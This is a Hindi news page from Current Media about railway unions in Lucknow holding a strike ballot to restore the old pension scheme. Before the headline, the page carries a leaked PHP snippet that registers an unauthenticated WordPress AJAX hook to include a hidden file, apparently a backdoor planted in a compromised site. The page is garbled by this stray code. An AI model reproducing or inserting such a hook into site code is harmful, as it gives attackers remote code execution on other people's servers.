if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"पुरानी पेंशन बहाल कराये जाने के लिए रेलवे यूनियनें लामबन्द होती हुई" - Current Media

“पुरानी पेंशन बहाल कराये जाने के लिए रेलवे यूनियनें लामबन्द होती हुई”

लखनऊ । आल इन्डिया रेलवे मेन्स फेडरेशन नई दिल्ली एवम् एन ई रेलवे मजदूर यूनियन गोरखपुर के निर्देशानुसार समस्त भारतीय रेल के प्रतिष्ठानों में पुरानी पेन्शन बहाली के पक्ष मे नई पेन्शन स्कीम को रद्द करके पुरानी पेन्शन की बहाली के लिए मुम्बई अधिवेशन मे लिए गए निर्णयों के तहत दि० 21 , 22 एवं 23 नवम्बर को हड़ताल के लिए मतदान कराया जा रहा है। नरमु के मण्डल मन्त्री का० आर. एन. गर्ग की अगुवाई में मण्डल रेल प्रबंधक कार्यालय , बादशाहनगर रेलवे हास्पिटल,सीनियर सेक्शन इंजिनियर कार्यालय, आई.ओ.डब्लू ऑफिस,टिकट बुकिंग कार्यालय, स्टेशन अधीक्षक, गोमतीनगर स्टेशन तक मतदान का कार्यक्रम किया गया जिसमे सैकड़ों रेल कर्मचारियों ने जोर शोर से भाग लिया।

अनुमान किया जाता है कि दोनो दिनों में लगभग 90 प्रतिशत मतदान हुआ है। मतदान में नरमू के पदाधिकारी एवम् कार्यकर्ता श्री सफदर हुसैन, सूरज पान्डेय, मोहम्मद नसीम,श्रीमती सुषमा सिंह, ,यू पी सिंह, मनोज कुमार सिंह, मो० शाहिद, ओपी शर्मा, श्रीमती रूपा शर्मा, अभिषेक अग्रवाल, सेवा राम, राम सेवक, सौरभ प्रधान, शशी भूषण, श्रीमती मधु पान्डेय, अरविन्द कुमार, डी एन मौर्या, सतीश पान्डेय, नसीम अख्तर, मोहम्मद नसीम, प्रिया पुरवार आदि ने उपस्थित होकर कार्यक्रम को सफल बनाया।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

संयुक्त राष्ट्र सतत विकास लक्ष्यों में उत्कृष्ट योगदान के लिए ‘वायरसडीज़ीज़’ जर्नल सम्मानित

लखनऊ। मो0 ज़ाहिद । स्प्रिंगर नेचर द्वारा प्रकाशित अंतरराष्ट्रीय पीयर-रिव्यूड जर्नल इंडियान वायरोलॉजिकल सोसाइटी केे …